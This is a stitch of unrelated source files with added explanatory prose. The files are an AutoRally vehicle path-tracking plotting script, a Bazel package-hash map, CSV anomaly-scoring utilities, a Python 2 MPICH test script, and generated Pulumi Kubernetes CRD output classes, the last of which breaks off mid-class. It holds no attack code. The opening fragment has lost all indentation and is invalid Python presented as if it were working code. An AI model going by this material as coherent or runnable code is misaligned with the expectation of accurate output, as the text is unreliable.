x_err_path = x_sim[:, :, arcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, arcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax1.set_aspect("equal")
ax2 = axs[1]
plot_u_indices = [arcar.VDELTA, arcar.OMEGA_R_DOT]
plot_u_labels = ["$v_\\delta$", r"$\dot{\omega}_r$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, : AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
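The reference path above is generated by Euler-integrating the heading first and then the position. Under constant `v_ref` and `omega_ref` this traces a circle of radius `v_ref / omega_ref`; a standalone numerical check of that property (parameters chosen to match this test, but independent of the class):

```python
import numpy as np

dt, v_ref, omega_ref = 1e-3, 10.0, 0.5
n = 2000
psi = np.zeros(n)
x = np.zeros(n)
y = np.zeros(n)
for t in range(1, n):
    psi[t] = psi[t - 1] + dt * omega_ref           # integrate heading
    x[t] = x[t - 1] + dt * v_ref * np.cos(psi[t])  # then position
    y[t] = y[t - 1] + dt * v_ref * np.sin(psi[t])

R = v_ref / omega_ref          # expected turning radius: 20 m
center = (0.0, R)              # circle center when psi(0) = 0
dist = np.hypot(x - center[0], y - center[1])
print(dist.min(), dist.max())  # both close to 20
```

Updating `psi` before using it in the position update keeps the heading and position integrations consistent within each step, which is exactly the ordering used in the loop above.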


def plot_autorally_s_path(v_ref: float = 10.0):
    """Test the dynamics of the kinematic car tracking an S path"""
    # Create the system
    params = {
        "psi_ref": 1.0,
        "v_ref": v_ref,
        "omega_ref": 0.0,
    }
    dt = 0.01
    arcar = AutoRally(params, dt)
    upper_u_lim, lower_u_lim = arcar.control_limits

    # Simulate!
    # (but first make somewhere to save the results)
    t_sim = 10.0
    n_sims = 1
    controller_period = dt
    num_timesteps = int(t_sim // dt)
    start_x = arcar.goal_point.clone()
    start_x[:, AutoRally.SYE] = 1.0
    start_x[:, AutoRally.SXE] = -1.0
    x_sim = torch.zeros(num_timesteps, n_sims, arcar.n_dims).type_as(start_x)
    for i in range(n_sims):
        x_sim[0, i, :] = start_x

    u_sim = torch.zeros(num_timesteps, n_sims, arcar.n_controls).type_as(start_x)
    controller_update_freq = int(controller_period / dt)

    # And create a place to store the reference path
    x_ref = np.zeros(num_timesteps)
    y_ref = np.zeros(num_timesteps)
    psi_ref = np.zeros(num_timesteps)
    psi_ref[0] = 1.0

    # Simulate!
    pt = copy(params)
    for tstep in tqdm.trange(1, num_timesteps):
        # Get the path parameters at this point
        omega_ref_t = 1.0 * np.sin(tstep * dt) + params["omega_ref"]
        psi_ref[tstep] = dt * omega_ref_t + psi_ref[tstep - 1]
        pt = copy(pt)
        pt["psi_ref"] = psi_ref[tstep]
        x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
        y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
        pt["omega_ref"] = omega_ref_t

        # Get the current state
        x_current = x_sim[tstep - 1, :, :]

        # Get the control input at the current state if it's time
        if tstep == 1 or tstep % controller_update_freq == 0:
            u = arcar.u_nominal(x_current, pt)
            for dim_idx in range(arcar.n_controls):
                u[:, dim_idx] = torch.clamp(
                    u[:, dim_idx],
                    min=lower_u_lim[dim_idx].item(),
                    max=upper_u_lim[dim_idx].item(),
                )
            u_sim[tstep, :, :] = u
        else:
            u = u_sim[tstep - 1, :, :]
            u_sim[tstep, :, :] = u

        # Simulate forward using the dynamics
        for i in range(n_sims):
            xdot = arcar.closed_loop_dynamics(
                x_current[i, :].unsqueeze(0),
                u[i, :].unsqueeze(0),
                pt,
            )
            x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()

        t_final = tstep
    t = np.linspace(0, t_sim, num_timesteps)

    # Convert trajectory from path-centric to world coordinates
    x_err_path = x_sim[:, :, arcar.SXE].cpu().squeeze().numpy()
    y_err_path = x_sim[:, :, arcar.SYE].cpu().squeeze().numpy()
    x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
    y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)

    fig, axs = plt.subplots(3, 1)
    fig.set_size_inches(10, 12)
    ax1 = axs[0]
    ax1.plot(
        x_world[:t_final],
        y_world[:t_final],
        linestyle="-",
        label="Tracking",
    )
    ax1.plot(
        x_ref[:t_final],
        y_ref[:t_final],
        linestyle=":",
        label="Reference",
    )
    ax1.set_xlabel("$x$")
    ax1.set_ylabel("$y$")
    ax1.legend()
    # ax1.set_aspect("equal")

    ax2 = axs[1]
    plot_u_indices = [arcar.VDELTA, arcar.OMEGA_R_DOT]
    plot_u_labels = ["$v_\\delta$", r"$\dot{\omega}_r$"]
    for i_trace in range(len(plot_u_indices)):
        ax2.plot(
            t[1:t_final],
            u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
            label=plot_u_labels[i_trace],
        )
    ax2.legend()

    ax3 = axs[2]
    ax3.plot(
        t[:t_final],
        x_sim[:t_final, :, : AutoRally.PSI_E + 1].norm(dim=-1).squeeze().numpy(),
        label="Tracking Error",
    )
    ax3.legend()
    ax3.set_xlabel("$t$")

    plt.show()

    # Return the maximum tracking error
    tracking_error = x_sim[:, :, : AutoRally.PSI_E + 1]
    return tracking_error[:t_final, :, :].norm(dim=-1).squeeze().max()


if __name__ == "__main__":
    # plot_autorally_straight_path()
    # plot_autorally_circle_path()
    plot_autorally_s_path()
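The path-centric to world conversion used before plotting above is a plain 2-D rotation: the `(sxe, sye)` tracking error lives in a frame rotated by the reference heading `psi_ref`, so the world position is the reference position plus the rotated error. A standalone sketch (NumPy assumed; the function name is illustrative, not part of the module):

```python
import numpy as np

def path_error_to_world(x_ref, y_ref, psi_ref, x_err, y_err):
    # Rotate the path-frame error by the reference heading and add it
    # to the reference position, mirroring the conversion above.
    x_world = x_ref + x_err * np.cos(psi_ref) - y_err * np.sin(psi_ref)
    y_world = y_ref + x_err * np.sin(psi_ref) + y_err * np.cos(psi_ref)
    return x_world, y_world
```

With a zero reference heading the error frame coincides with the world frame, so the offsets simply add.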
# debian/ssh.bzl (from Ewpratten/frc_971_mirror, BSD-2-Clause)
files = {
    "openssh-client_6.7p1-5+deb8u8_amd64.deb": "50bf902cc680fd1442556325e47d892f24621d7f0c4baf826f298d737a1e8030",
}
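The map above pins a Debian package to its expected SHA-256 digest. Outside of Bazel, a downloaded artifact can be checked against such a pinned digest with a short Python sketch (the function name is illustrative):

```python
import hashlib

def sha256_of(path: str) -> str:
    # Stream the file in chunks so large .deb archives never need to
    # sit in memory all at once.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Comparing `sha256_of("openssh-client_...deb")` against the pinned hex string detects a corrupted or tampered download.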
# edi/util/utils.py (from GaloisInc/adapt, BSD-3-Clause)
import csv
import gzip


def readRecord(header, row):
    uuid = row[0]
    record = {h: v for (h, v) in zip(header, map(lambda x: int(x), row[1:]))}
    return (uuid, record)


class BatchProcessor:
    def __init__(self, input_file, output_file, model_name, mk_model):
        self.input_file = input_file
        self.output_file = output_file
        self.model_name = model_name
        self.mk_model = mk_model

    def create_model(self, csv_file):
        reader = csv.reader(csv_file)
        header = next(reader)[1:]
        print('Scoring batch using %s' % self.model_name)
        score_header = 'Object_ID,%sScore\n' % self.model_name
        m = self.mk_model(header)
        for row in reader:
            (uuid, record) = readRecord(header, row)
            m.update(record)
        return (m, score_header)

    def write_scores(self, csv_file, score_file, m, score_header):
        reader = csv.reader(csv_file)
        header = next(reader)[1:]
        score_file.write(score_header)
        for row in reader:
            (uuid, record) = readRecord(header, row)
            score = m.score(record)
            score_file.write("%s, %f\n" % (uuid, score))

    def process(self):
        if self.input_file.endswith('.gz'):
            with gzip.open(self.input_file, 'rt') as csv_file:
                (m, score_header) = self.create_model(csv_file)
            with gzip.open(self.input_file, 'rt') as csv_file, open(self.output_file, 'w') as score_file:
                self.write_scores(csv_file, score_file, m, score_header)
        else:
            with open(self.input_file, 'rt') as csv_file:
                (m, score_header) = self.create_model(csv_file)
            with open(self.input_file, 'rt') as csv_file, open(self.output_file, 'w') as score_file:
                self.write_scores(csv_file, score_file, m, score_header)


class StreamProcessor:
    def __init__(self, input_file, output_file, model_name, mk_model):
        self.input_file = input_file
        self.output_file = output_file
        self.model_name = model_name
        self.mk_model = mk_model

    def handle_stream(self, csv_file, score_file):
        reader = csv.reader(csv_file)
        header = next(reader)[1:]
        print('Scoring stream using %s' % self.model_name)
        score_header = 'Object_ID,%sScore\n' % self.model_name
        m = self.mk_model(header)
        score_file.write(score_header)
        totalscore = 0.0
        for row in reader:
            (uuid, record) = readRecord(header, row)
            score = m.score(record)
            totalscore = totalscore + score
            m.update(record)
            score_file.write("%s, %f\n" % (uuid, score))
        print("Total score: %f Entropy: %f" % (totalscore, totalscore / m.n))

    def process(self):
        if self.input_file.endswith('.gz'):
            with gzip.open(self.input_file, 'rt') as csv_file, open(self.output_file, 'w') as score_file:
                self.handle_stream(csv_file, score_file)
        else:
            with open(self.input_file, 'rt') as csv_file, open(self.output_file, 'w') as score_file:
                self.handle_stream(csv_file, score_file)
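Both processors assume a CSV whose first column is an object UUID and whose remaining columns are integer features; `readRecord` turns each row into a `(uuid, feature-dict)` pair. A minimal illustration of that row shape (column names invented, mirroring `readRecord` above):

```python
import csv
import io

def read_record(header, row):
    # Same contract as readRecord above: UUID first, integer features after.
    uuid = row[0]
    record = {h: int(v) for h, v in zip(header, row[1:])}
    return uuid, record

reader = csv.reader(io.StringIO("Object_ID,reads,writes\nabc-123,3,7\n"))
header = next(reader)[1:]  # drop the Object_ID column, as the processors do
uuid, record = read_record(header, next(reader))
# uuid == "abc-123", record == {"reads": 3, "writes": 7}
```

Any object passed as `mk_model` just needs to return something with `update(record)` and `score(record)` methods over dicts of this shape.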
#!/usr/bin/env python
# src/pm/mpd/test/test3.py (from raffenet/mpich-CVS, mpich2 license)
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
# Note that I repeat code for each test just in case I want to
# run one separately. I can simply copy it out of here and run it.
# A single test can typically be chgd simply by altering its value(s)
# for one or more of:
# PYEXT, NMPDS, HFILE
import os, sys, commands
sys.path += [os.getcwd()] # do this once
print "mpi tests---------------------------------------------------"
clusterHosts = [ 'bp4%02d' % (i) for i in range(0,8) ]
print "clusterHosts=", clusterHosts
MPIDir = "/home/rbutler/mpich2"
# test: cpi
print "TEST cpi"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['Process 0 of 3','Process 1 of 3','Process 2 of 3']
rv = mpdtest.run(cmd="mpiexec%s -n 3 %s/examples/cpi" % (PYEXT,MPIDir),
                 grepOut=1, expOut=expout)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawn1
print "TEST spawn1"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawn1" % (olddir,PYEXT), # -n 1
                 grepOut=1, expOut=expout)
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawn2
print "TEST spawn2"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawn2" % (olddir,PYEXT), # -n 1
                 grepOut=1, expOut=expout)
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawnmult2
print "TEST spawnmult2"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 2 spawnmult2" % (olddir,PYEXT), # -n 2
                 grepOut=1, expOut=expout)
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawnargv
print "TEST spawnargv"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawnargv" % (olddir,PYEXT), # -n 2
                 grepOut=1, expOut=expout)
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: spawnintra
print "TEST spawnintra"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 spawnintra" % (olddir,PYEXT), # -n 2
                 grepOut=1, expOut=expout)
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: namepub
print "TEST namepub"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['No Errors']
olddir = os.getcwd()
os.chdir('%s/test/mpi/spawn' % (MPIDir))
rv = mpdtest.run(cmd="%s/mpiexec%s -n 1 namepub" % (olddir,PYEXT), # -n 2
                 grepOut=1, expOut=expout)
os.chdir(olddir)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
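Each test above passes `grepOut=1` and a list of `expOut` strings to `MPDTest.run`. The intended check, as a plain-Python sketch (this is a guess at the semantics for illustration, not mpdlib's actual implementation), is that every expected string appears somewhere in the command's output:

```python
def output_matches(output, expected):
    # Every expected string must occur in at least one line of output,
    # grep-style; the test fails if any expected string is missing.
    lines = output.splitlines()
    return all(any(exp in line for line in lines) for exp in expected)
```

So `expout = ['No Errors']` passes as long as one line of the test binary's output contains "No Errors".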
# operators/multicluster-operators-subscription/python/pulumi_pulumi_kubernetes_crds_operators_multicluster_operators_subscription/apps/v1/outputs.py
# (from pulumi/pulumi-kubernetes-crds, Apache-2.0)
# coding=utf-8
# *** WARNING: this file was generated by crd2pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs

__all__ = [
    'ChannelSpec',
    'ChannelSpecConfigMapRef',
    'ChannelSpecGates',
    'ChannelSpecGatesLabelSelector',
    'ChannelSpecGatesLabelSelectorMatchExpressions',
    'ChannelSpecSecretRef',
    'DeployableSpec',
    'DeployableSpecDependencies',
    'DeployableSpecOverrides',
    'DeployableSpecPlacement',
    'DeployableSpecPlacementClusterSelector',
    'DeployableSpecPlacementClusterSelectorMatchExpressions',
    'DeployableSpecPlacementClusters',
    'DeployableSpecPlacementPlacementRef',
    'DeployableStatus',
    'HelmReleaseRepo',
    'HelmReleaseRepoConfigMapRef',
    'HelmReleaseRepoSecretRef',
    'HelmReleaseRepoSource',
    'HelmReleaseRepoSourceGithub',
    'HelmReleaseRepoSourceHelmRepo',
    'HelmReleaseStatus',
    'HelmReleaseStatusConditions',
    'HelmReleaseStatusDeployedRelease',
    'PlacementRuleSpec',
    'PlacementRuleSpecClusterConditions',
    'PlacementRuleSpecClusterSelector',
    'PlacementRuleSpecClusterSelectorMatchExpressions',
    'PlacementRuleSpecClusters',
    'PlacementRuleSpecPolicies',
    'PlacementRuleSpecResourceHint',
    'PlacementRuleStatus',
    'PlacementRuleStatusDecisions',
    'SubscriptionSpec',
    'SubscriptionSpecHooksecretref',
    'SubscriptionSpecOverrides',
    'SubscriptionSpecPackageFilter',
    'SubscriptionSpecPackageFilterFilterRef',
    'SubscriptionSpecPackageFilterLabelSelector',
    'SubscriptionSpecPackageFilterLabelSelectorMatchExpressions',
    'SubscriptionSpecPackageOverrides',
    'SubscriptionSpecPlacement',
    'SubscriptionSpecPlacementClusterSelector',
    'SubscriptionSpecPlacementClusterSelectorMatchExpressions',
    'SubscriptionSpecPlacementClusters',
    'SubscriptionSpecPlacementPlacementRef',
    'SubscriptionSpecTimewindow',
    'SubscriptionSpecTimewindowHours',
    'SubscriptionStatus',
    'SubscriptionStatusAnsiblejobs',
    'SubscriptionStatusStatuses',
    'SubscriptionStatusStatusesPackages',
]

@pulumi.output_type
class ChannelSpec(dict):
    """
    ChannelSpec defines the desired state of Channel
    """
    def __init__(__self__, *,
                 pathname: str,
                 type: str,
                 config_map_ref: Optional['outputs.ChannelSpecConfigMapRef'] = None,
                 gates: Optional['outputs.ChannelSpecGates'] = None,
                 insecure_skip_verify: Optional[bool] = None,
                 secret_ref: Optional['outputs.ChannelSpecSecretRef'] = None,
                 source_namespaces: Optional[Sequence[str]] = None):
        """
        ChannelSpec defines the desired state of Channel
        :param str pathname: For a `namespace` channel, pathname is the name of the namespace; For a `helmrepo` or `github` channel, pathname is the remote URL for the channel contents; For a `objectbucket` channel, pathname is the URL and name of the bucket.
        :param str type: ChannelType defines types of channel
        :param 'ChannelSpecConfigMapRefArgs' config_map_ref: Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
        :param 'ChannelSpecGatesArgs' gates: Criteria for promoting a Deployable from the sourceNamespaces to Channel.
        :param bool insecure_skip_verify: Skip server TLS certificate verification for Git or Helm channel.
        :param 'ChannelSpecSecretRefArgs' secret_ref: For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For a `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
        :param Sequence[str] source_namespaces: A list of namespace names from which Deployables can be promoted.
        """
        pulumi.set(__self__, "pathname", pathname)
        pulumi.set(__self__, "type", type)
        if config_map_ref is not None:
            pulumi.set(__self__, "config_map_ref", config_map_ref)
        if gates is not None:
            pulumi.set(__self__, "gates", gates)
        if insecure_skip_verify is not None:
            pulumi.set(__self__, "insecure_skip_verify", insecure_skip_verify)
        if secret_ref is not None:
            pulumi.set(__self__, "secret_ref", secret_ref)
        if source_namespaces is not None:
            pulumi.set(__self__, "source_namespaces", source_namespaces)

    @property
    @pulumi.getter
    def pathname(self) -> str:
        """
        For a `namespace` channel, pathname is the name of the namespace; For a `helmrepo` or `github` channel, pathname is the remote URL for the channel contents; For a `objectbucket` channel, pathname is the URL and name of the bucket.
        """
        return pulumi.get(self, "pathname")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        ChannelType defines types of channel
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="configMapRef")
    def config_map_ref(self) -> Optional['outputs.ChannelSpecConfigMapRef']:
        """
        Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
        """
        return pulumi.get(self, "config_map_ref")

    @property
    @pulumi.getter
    def gates(self) -> Optional['outputs.ChannelSpecGates']:
        """
        Criteria for promoting a Deployable from the sourceNamespaces to Channel.
        """
        return pulumi.get(self, "gates")

    @property
    @pulumi.getter(name="insecureSkipVerify")
    def insecure_skip_verify(self) -> Optional[bool]:
        """
        Skip server TLS certificate verification for Git or Helm channel.
        """
        return pulumi.get(self, "insecure_skip_verify")

    @property
    @pulumi.getter(name="secretRef")
    def secret_ref(self) -> Optional['outputs.ChannelSpecSecretRef']:
        """
        For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For a `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
        """
        return pulumi.get(self, "secret_ref")

    @property
    @pulumi.getter(name="sourceNamespaces")
    def source_namespaces(self) -> Optional[Sequence[str]]:
        """
        A list of namespace names from which Deployables can be promoted.
        """
        return pulumi.get(self, "source_namespaces")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class ChannelSpecConfigMapRef(dict):
    """
    Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
    """
    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 resource_version: Optional[str] = None,
                 uid: Optional[str] = None):
        """
        Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
        :param str api_version: API version of the referent.
        :param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        :param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        :param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        :param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        :param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
        :param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        if api_version is not None:
            pulumi.set(__self__, "api_version", api_version)
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        API version of the referent.
        """
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """
        If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        """
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """
        Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """
        Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """
        Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
        """
        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """
        UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class ChannelSpecGates(dict):
    """
    Criteria for promoting a Deployable from the sourceNamespaces to Channel.
    """
    def __init__(__self__, *,
                 annotations: Optional[Mapping[str, str]] = None,
                 label_selector: Optional['outputs.ChannelSpecGatesLabelSelector'] = None,
                 name: Optional[str] = None):
        """
        Criteria for promoting a Deployable from the sourceNamespaces to Channel.
        :param Mapping[str, str] annotations: The annotations which must present on a Deployable for it to be eligible for promotion.
        :param 'ChannelSpecGatesLabelSelectorArgs' label_selector: A label selector for selecting the Deployables.
        """
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if label_selector is not None:
            pulumi.set(__self__, "label_selector", label_selector)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[Mapping[str, str]]:
        """
        The annotations which must present on a Deployable for it to be eligible for promotion.
        """
        return pulumi.get(self, "annotations")

    @property
    @pulumi.getter(name="labelSelector")
    def label_selector(self) -> Optional['outputs.ChannelSpecGatesLabelSelector']:
        """
        A label selector for selecting the Deployables.
        """
        return pulumi.get(self, "label_selector")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        return pulumi.get(self, "name")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class ChannelSpecGatesLabelSelector(dict):
    """
    A label selector for selecting the Deployables.
    """
    def __init__(__self__, *,
                 match_expressions: Optional[Sequence['outputs.ChannelSpecGatesLabelSelectorMatchExpressions']] = None,
                 match_labels: Optional[Mapping[str, str]] = None):
        """
        A label selector for selecting the Deployables.
        :param Sequence['ChannelSpecGatesLabelSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
        :param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
        """
        if match_expressions is not None:
            pulumi.set(__self__, "match_expressions", match_expressions)
        if match_labels is not None:
            pulumi.set(__self__, "match_labels", match_labels)

    @property
    @pulumi.getter(name="matchExpressions")
    def match_expressions(self) -> Optional[Sequence['outputs.ChannelSpecGatesLabelSelectorMatchExpressions']]:
        """
        matchExpressions is a list of label selector requirements. The requirements are ANDed.
        """
        return pulumi.get(self, "match_expressions")

    @property
    @pulumi.getter(name="matchLabels")
    def match_labels(self) -> Optional[Mapping[str, str]]:
        """
        matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
        """
        return pulumi.get(self, "match_labels")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class ChannelSpecGatesLabelSelectorMatchExpressions(dict):
    """
    A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
    """
    def __init__(__self__, *,
                 key: str,
                 operator: str,
